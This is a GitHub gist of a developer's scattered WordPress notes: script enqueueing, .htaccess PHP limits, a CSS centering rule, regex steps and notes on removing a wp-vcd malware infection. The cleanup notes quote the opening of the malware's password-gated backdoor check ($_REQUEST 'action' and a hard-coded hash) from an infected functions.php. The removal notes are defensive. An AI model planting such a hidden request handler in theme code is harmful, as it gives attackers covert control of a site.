Skip to content

Instantly share code, notes, and snippets.

View mohammadkhoeini's full-sized avatar

mohammad khoeini mohammadkhoeini

View GitHub Profile
@mohammadkhoeini
mohammadkhoeini / WP - Load Script with Variables
Created May 2, 2019 10:52
WP - Load Script with Variables For WordPress
wp_enqueue_script('SCRIPT_UNIQE_NAME', 'JSURL');
wp_localize_script( 'SCRIPT_UNIQE_NAME', 'VARIABLE_NAME', array(
'ObjName' => get_theme_mod( 'Name' , '#000'),
)
);
Put these in top of .htaccess file in Located in Root of wordpress folder
php_value upload_max_filesize 2048M
php_value post_max_size 2048M
php_value memory_limit 2048m
php_value max_execution_time 300
php_value max_input_time 300
config.php
for dynamic content with position absolute
position: absolute;
left: 50%;
-webkit-transform: translateX(-50%);
transform: translateX(-50%);
What I did to slove problem
In wp-include directory, delete wp-vcd.php and class.wp.php files
In wp-include directory, open post.php and detele first php tag added by Malware.
Open to theme’s functions.php file, and delete the above codes.
This should stop popups. But I don’t now how long it works.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '429acb1c29e4800452a3538a8f91edd0'))
{
https://regexr.com/
1- main regex
rtpf-\w*-\w*|rtpf-\w*|rtpf-\w*-\w*-\w*
2- put them into '' with replace tools also add array simbol => with same string in both side
3- then find all => 'rtpf- and replace with => ' for better naming
4- remove dublicates